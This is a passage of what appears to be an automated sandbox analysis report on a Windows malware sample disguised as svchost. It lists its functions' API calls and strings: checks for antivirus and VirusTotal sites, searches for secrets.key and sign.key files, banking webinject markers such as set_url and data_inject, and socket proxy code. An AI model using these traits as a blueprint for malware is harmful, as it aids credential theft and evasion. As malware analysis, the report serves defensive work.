                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000000), ref: 02659D47
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 02659D5A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000005), ref: 02659D67
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02659D6E
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 02659D7A
                                                                                                                                                                                                              • connect.WS2_32(?,?,00000010), ref: 02659D9C
                                                                                                                                                                                                              • send.WS2_32(?,?,0000000A,00000000), ref: 02659DB6
                                                                                                                                                                                                              • send.WS2_32(?,?,0000000A,00000000), ref: 02659DD0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02659970,?,00000000,00000000), ref: 02659DEA
                                                                                                                                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 02659CBC
                                                                                                                                                                                                                • Part of subcall function 026598F0: shutdown.WS2_32(?,00000001), ref: 0265990B
                                                                                                                                                                                                                • Part of subcall function 026598F0: shutdown.WS2_32(026599EC,00000001), ref: 02659910
                                                                                                                                                                                                                • Part of subcall function 026598F0: recv.WS2_32(026599EC,?,00000400,00000000), ref: 0265992F
                                                                                                                                                                                                                • Part of subcall function 026598F0: recv.WS2_32(?,?,00000400,00000000), ref: 02659945
                                                                                                                                                                                                                • Part of subcall function 026598F0: closesocket.WS2_32(?), ref: 02659959
                                                                                                                                                                                                                • Part of subcall function 026598F0: closesocket.WS2_32(026599EC), ref: 0265995C
                                                                                                                                                                                                                • Part of subcall function 026598F0: ExitThread.KERNEL32 ref: 02659960
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02659DFC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: recv$Heap$send$Process$AllocThreadclosesocketshutdown$CloseCreateExitFreeHandleconnectgethostbynamehtonsinet_ntoasocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 699211285-0
                                                                                                                                                                                                              • Opcode ID: 28a1fc3abd639524262c92bb58386f3da51de9fbb3628ad90a729b2ad7cb0b69
                                                                                                                                                                                                              • Instruction ID: 769f16d4c44d3e18dd0e1865805ce0313802cee3d377b130414e443ef4f50dec
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 28a1fc3abd639524262c92bb58386f3da51de9fbb3628ad90a729b2ad7cb0b69
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE91A1B1645350BEE320EB748C85F6F7BD9AB84704F446E1CFA82962C1D774E444CBA6
                                                                                                                                                                                                              Function 02646100 Relevance: 36.1, APIs: 12, Strings: 12, Instructions: 71COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,avast.com,?,?,0264626C), ref: 0264611B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,kaspersky,?,?,0264626C), ref: 0264612B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,drweb,?,?,0264626C), ref: 02646137
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,eset.com,?,?,0264626C), ref: 02646143
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,antivir,?,?,0264626C), ref: 0264614F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,avira,?,?,0264626C), ref: 0264615B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,virustotal,?,?,0264626C), ref: 02646167
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,virusinfo,?,?,0264626C), ref: 02646173
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,z-oleg.com,?,?,0264626C), ref: 0264617F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,trendsecure,?,?,0264626C), ref: 0264618B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,anti-malware,?,?,0264626C), ref: 02646197
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,.comodo.com,?,?,0264626C), ref: 026461A3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$trendsecure$virusinfo$virustotal$z-oleg.com
                                                                                                                                                                                                              • API String ID: 0-375433535
                                                                                                                                                                                                              • Opcode ID: 1b7709a6bb653b6aa229eaa4e7866aad0ab581b647d9d8fd3258e6ee3349c33a
                                                                                                                                                                                                              • Instruction ID: c645ad95be6d4f30cbe1c8cf6226eddadd4d37e240217f698e9bd8a6797d35f0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b7709a6bb653b6aa229eaa4e7866aad0ab581b647d9d8fd3258e6ee3349c33a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1016763BC2B5629FB21717ECC95F5F768C5D8BC883820720F946E6206EB86C10B04A5
                                                                                                                                                                                                              Function 02641000 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 155memorythreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,0264148C,00000000,?), ref: 0264101B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013,76F8F570,?,0264148C,00000000,?), ref: 0264103E
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,0264148C,00000000,?), ref: 02641045
                                                                                                                                                                                                              • memset.MSVCRT ref: 02641055
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,76F8F570,?,0264148C,00000000,?), ref: 02641073
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,name.key,00000000,?,0264148C,00000000,?), ref: 02641093
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02660810,00000000,00000000,00000000), ref: 026410B9
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,\secrets.key,?,0264148C,00000000,?), ref: 026410D5
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026620D0,00000000,00000000,00000000), ref: 026410E5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,sign.key,?,0264148C,00000000,?), ref: 026410FD
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02662BB0,00000000,00000000,00000000), ref: 02641116
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,?,0264148C,00000000,?), ref: 0264112A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,0264148C,00000000,?), ref: 0264113B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,0264148C,00000000,?), ref: 02641150
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,0264148C,00000000,?), ref: 02641153
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,0264148C,00000000,?), ref: 0264115F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,0264148C,00000000,?), ref: 02641162
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$CreateProcessThread$ByteCharHandleMultiWide$AllocCloseFreeInformationValidatememset
                                                                                                                                                                                                              • String ID: \secrets.key$name.key$sign.key
                                                                                                                                                                                                              • API String ID: 3254303593-2345338882
                                                                                                                                                                                                              • Opcode ID: 6abe087d97a223597390a70a31bfd03d84be76dd3fa9cfeaef54d7fdff9c011b
                                                                                                                                                                                                              • Instruction ID: 113539cb28c5db193e1a82d183ddf69d815360b99df4bd13312bf1ef84278f95
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6abe087d97a223597390a70a31bfd03d84be76dd3fa9cfeaef54d7fdff9c011b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F441E3315802957BE7316B669C8CDBF3F3CEAC7F64B514658F85AA3240DF218881C6B5
                                                                                                                                                                                                              Function 00403050 Relevance: 33.7, APIs: 18, Strings: 1, Instructions: 436commemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,?,?,76A8DB30), ref: 00403060
                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00403080
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404418,00000000,00000001,00404208,?), ref: 004030A7
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030BF
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030DA
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030F8
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00403116
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040319C
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031A2
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031A8
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031AE
                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(004036D6), ref: 004031ED
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00404F4C), ref: 00403396
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004033BB
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004033D9
                                                                                                                                                                                                                • Part of subcall function 00402F70: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004031C1,00404F38), ref: 00402F78
                                                                                                                                                                                                                • Part of subcall function 00402F70: HeapAlloc.KERNEL32(00000000,?,004031C1,00404F38), ref: 00402F7F
                                                                                                                                                                                                                • Part of subcall function 00402F70: SysAllocString.OLEAUT32(004031C1), ref: 00402FA0
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00403486
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040348C
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00403492
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
                                                                                                                                                                                                              • String ID: cmd.exe
                                                                                                                                                                                                              • API String ID: 2839743307-723907552
                                                                                                                                                                                                              • Opcode ID: c83219c8b1fcc2364968f814fc3d8ceb50f78c4147f13553458a25b82dac8a32
                                                                                                                                                                                                              • Instruction ID: bf3241a60ff26ee6c0642b95ea0adfafd6aded52afbf6c2e6df27db904542273
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c83219c8b1fcc2364968f814fc3d8ceb50f78c4147f13553458a25b82dac8a32
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CF1EC75E102199FCB00DFA8C884A9EBBB9FF88710F15815AE914BB351D774AD41CF94
                                                                                                                                                                                                              Function 026610C0 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 192memoryfilestringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A5C5,?,753CBF00), ref: 026610F0
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,753CBF00), ref: 02661131
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,753CBF00), ref: 0266113B
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02661143
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02661154
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,753CBF00), ref: 0266115B
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,753CBF00), ref: 0266119A
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,753CBF00), ref: 026611A7
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,753CBF00), ref: 026611F0
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,753CBF00), ref: 0266120C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104,?,753CBF00), ref: 02661229
                                                                                                                                                                                                                • Part of subcall function 02669780: GetProcessHeap.KERNEL32(00000008,00004070,76F90F00,00000000,76F92F00,?,02653CE8,?), ref: 02669793
                                                                                                                                                                                                                • Part of subcall function 02669780: HeapAlloc.KERNEL32(00000000,?,02653CE8,?), ref: 02669796
                                                                                                                                                                                                                • Part of subcall function 02669780: memset.MSVCRT ref: 026697AB
                                                                                                                                                                                                                • Part of subcall function 02669780: CreateFileA.KERNEL32(02653CE8,40000000,00000003,00000000,00000002,00000080,00000000,?,02653CE8,?), ref: 02669802
                                                                                                                                                                                                                • Part of subcall function 02669780: GetProcessHeap.KERNEL32(00000000,00000000,?,02653CE8,?), ref: 02669825
                                                                                                                                                                                                                • Part of subcall function 02669780: HeapValidate.KERNEL32(00000000,?,02653CE8,?), ref: 02669828
                                                                                                                                                                                                                • Part of subcall function 02669780: GetProcessHeap.KERNEL32(00000000,00000000,?,02653CE8,?), ref: 02669834
                                                                                                                                                                                                                • Part of subcall function 02669780: HeapFree.KERNEL32(00000000,?,02653CE8,?), ref: 02669837
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,753CBF00), ref: 02661258
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A5C5,?,753CBF00), ref: 02661277
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,?,753CBF00), ref: 026612DB
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,753CBF00), ref: 026612E8
                                                                                                                                                                                                                • Part of subcall function 02669910: LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,76F92F00), ref: 02669991
                                                                                                                                                                                                                • Part of subcall function 02669910: _snprintf.MSVCRT ref: 026699AD
                                                                                                                                                                                                                • Part of subcall function 02669910: FindFirstFileA.KERNEL32(00000000,?), ref: 026699BC
                                                                                                                                                                                                                • Part of subcall function 02669910: LocalFree.KERNEL32(00000000), ref: 026699C9
                                                                                                                                                                                                                • Part of subcall function 02669910: wsprintfA.USER32 ref: 02669A08
                                                                                                                                                                                                                • Part of subcall function 02669910: wsprintfA.USER32 ref: 02669A16
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$AllocFreePathProcess$AttributesBackslashCreateDirectoryErrorLastLocalVirtualwsprintf$AdminCurrentDeleteFindFirstFolderMakeModuleNameSystemUserValidate_snprintflstrcpynmemset
                                                                                                                                                                                                              • String ID: 8A99A5C5$\$inter.zip$path.txt
                                                                                                                                                                                                              • API String ID: 3082343898-2690403882
                                                                                                                                                                                                              • Opcode ID: 85f549f1571df7b23d106abf3ac692a843b13948665703a6ab04631f46d427eb
                                                                                                                                                                                                              • Instruction ID: 0c2cd0435fbb9024229cca2d66bc745998e73d9244e6cc2f74c3060f238d8c87
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 85f549f1571df7b23d106abf3ac692a843b13948665703a6ab04631f46d427eb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 756104709402496FDB25CB249C9CBFABBE8AF46300F5446D4E9CAD7340DF709A88CB90
                                                                                                                                                                                                              Function 026628F0 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 189memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A277,?,?,00000000), ref: 02662920
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000), ref: 02662961
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000), ref: 0266296B
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02662973
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02662984
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0266298B
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 026629BF
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,?,00000000), ref: 026629CC
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,00000000), ref: 02662A10
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,?,00000000), ref: 02662A2C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 02662A49
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryErrorFileLastPath$AdminAllocAttributesBackslashCreateCurrentFolderMakeModuleNameSystemUserVirtuallstrcpyn
                                                                                                                                                                                                              • String ID: 8A99A277$\$path.txt$rfk.zip
                                                                                                                                                                                                              • API String ID: 3351314726-816171664
                                                                                                                                                                                                              • Opcode ID: c9b0ece63cff02f421de9281cf0a698b3443cb1e7d3fe6c96311bc01430ae740
                                                                                                                                                                                                              • Instruction ID: ae2a405275712cc9459418b4318942cd6546adef0749ca46369f097044144a0a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9b0ece63cff02f421de9281cf0a698b3443cb1e7d3fe6c96311bc01430ae740
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE61F43090064A6FEB258B249CACBFB7BE9AF45304F544694E9C6D7240DFB19988CB90
                                                                                                                                                                                                              Function 02651320 Relevance: 31.8, APIs: 16, Strings: 5, Instructions: 275memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0268FB20,00000000,00000000,00000000,?,02651A39), ref: 02651330
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000020,?,02651A39), ref: 02651398
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,02651A39), ref: 0265139F
                                                                                                                                                                                                              • strstr.MSVCRT ref: 0265141F
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02651439
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02651453
                                                                                                                                                                                                              • strstr.MSVCRT ref: 0265146D
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02651497
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000020), ref: 026514B4
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026514BB
                                                                                                                                                                                                              • strstr.MSVCRT ref: 026515E4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0265161C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0265161F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0265162C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0265162F
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0268FB20,?,02651A39), ref: 0265163A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$strstr$Process$AllocCriticalSection$EnterFreeLeaveValidate
                                                                                                                                                                                                              • String ID: data_after$data_before$data_end$data_inject$set_url
                                                                                                                                                                                                              • API String ID: 2387113551-2328515424
                                                                                                                                                                                                              • Opcode ID: c3a2e0b045d3a65d0a1f256a0b95c6cf01b79999d9125761bf7bf0ba36ed3a20
                                                                                                                                                                                                              • Instruction ID: f6c68dc09e22b2a44aeb56779d769c113fbfd670b48957c1e62172a6ddc7603e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3a2e0b045d3a65d0a1f256a0b95c6cf01b79999d9125761bf7bf0ba36ed3a20
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3BA1CE74900351AFDB21CF24C9987AA7FE1AF46344F1886ADDC8A8B701EB72D645CB91
                                                                                                                                                                                                              Function 0264E000 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 211synchronizationwindowtimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0264DF80: GetDesktopWindow.USER32 ref: 0264DF8E
                                                                                                                                                                                                                • Part of subcall function 0264DF80: RealChildWindowFromPoint.USER32(00000000,?,0264E016,?,0264A857,?,76F930D0,?), ref: 0264DF95
                                                                                                                                                                                                                • Part of subcall function 0264DF80: IsWindowVisible.USER32(00000000), ref: 0264DFC1
                                                                                                                                                                                                                • Part of subcall function 0264DF80: GetParent.USER32(00000000), ref: 0264DFC8
                                                                                                                                                                                                                • Part of subcall function 0264DF80: GetWindowLongA.USER32(00000000,000000EC), ref: 0264DFD3
                                                                                                                                                                                                                • Part of subcall function 0264DF80: WindowFromPoint.USER32(76F930D0,?,?,0264E016,?,0264A857,?,76F930D0,?), ref: 0264DFE8
                                                                                                                                                                                                              • RealChildWindowFromPoint.USER32(00000000,?,0264A857,?,0264A857,?,76F930D0,?), ref: 0264E037
                                                                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000084,00000000,0264A857,00000002,00000064,?), ref: 0264E05D
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0264E081
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 0264E092
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 0264E09D
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 0264E0BB
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 0264E0C6
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0264A857), ref: 0264E0D2
                                                                                                                                                                                                              • GetAncestor.USER32(00000000,00000002), ref: 0264E0E6
                                                                                                                                                                                                              • GetWindowInfo.USER32(?,?), ref: 0264E129
                                                                                                                                                                                                              • PtInRect.USER32(?,?,0264A857), ref: 0264E154
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 0264E174
                                                                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000084,00000000,0264A857,00000002,00000064,000000FF), ref: 0264E1A3
                                                                                                                                                                                                              • MapWindowPoints.USER32(00000000,?,00000000,00000001), ref: 0264E1D0
                                                                                                                                                                                                              • RealChildWindowFromPoint.USER32(?,00000000,?), ref: 0264E1DB
                                                                                                                                                                                                              • MapWindowPoints.USER32(?,00000000,00000000,00000001), ref: 0264E1F7
                                                                                                                                                                                                              • RealChildWindowFromPoint.USER32(00000000,00000000,?), ref: 0264E202
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Long$FromPoint$ChildReal$MessagePointsSendTimeout$AncestorDesktopInfoMutexObjectParentRectReleaseSingleVisibleWait
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 1846550538-4251816714
                                                                                                                                                                                                              • Opcode ID: 8efcf4e335bd1112f357d9178b218ce29aa8a3af00d2f99917e031fa7f25bca0
                                                                                                                                                                                                              • Instruction ID: ce6a05b44186ffe1230e98ec0114510016a8cacb5f903b5d0628a195a70fa706
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8efcf4e335bd1112f357d9178b218ce29aa8a3af00d2f99917e031fa7f25bca0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9061AE75A40215BBDB20DE58DC84EBF77A9EB89721F504609FD61A3380DB71EC51CBA0
                                                                                                                                                                                                              Function 026638F0 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 189memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D098), ref: 02663920
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02663961
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0266396B
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02663973
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02663984
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0266398B
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 026639BF
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 026639CC
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02663A10
